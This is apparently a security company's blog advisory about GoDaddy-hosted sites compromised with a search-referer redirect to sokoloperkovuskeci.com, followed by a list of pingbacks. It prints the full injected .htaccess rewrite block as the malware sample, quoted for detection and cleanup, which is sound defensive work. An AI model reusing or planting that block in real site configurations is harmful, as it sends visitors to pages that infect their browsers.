We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105
This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]
What is going on?
These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).
What happens to anyone visiting these hacked sites?
The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users.
Need help?
You can scan your site here: sitecheck.sucuri.net to see if it is compromised. If you need someone to clean it up for you, sign up here: Sucuri Signup
About David Dede
Pingback: It’s shit like this GoDaddy « Meganet Central Industrial
Pingback: eXactBot Hosting Solutions » Hundreds of Go Daddy-hosted sites compromised
Pingback: Hundreds of Go Daddy-hosted sites compromised | PC Digital Tech - Digital Tech News Magazine
Pingback: Hundreds of Go Daddy-hosted sites compromised « ITS News Feeder
Pingback: GoDaddy Hosted Websites Under Attack « computeraddicted
Pingback: Drošības Eksperti
Pingback: Comprometen los servidores de hosting de GoDaddy - La Isla Buscada
Pingback: ste williams » Go Daddy mass hack points surfers towards malware
Pingback: Comprometen los servidores de hosting de GoDaddy | Blog DyTconsulting
Pingback: GoDaddy admet avoir été victime d’une attaque touchant 445 sitesMontserrat Agence de Communication | Montserrat Agence de Communication
Pingback: Is GoDaddy shared servers compromised? | Hosting Formula |Story, experience, trial and error in managing my blog and hosting things
Pingback: Tech News » Go Daddy mass hack points surfers towards malware
Pingback: Web Hosting » Blog Archive » Go Daddy Responds Over Compromised Hosting Accounts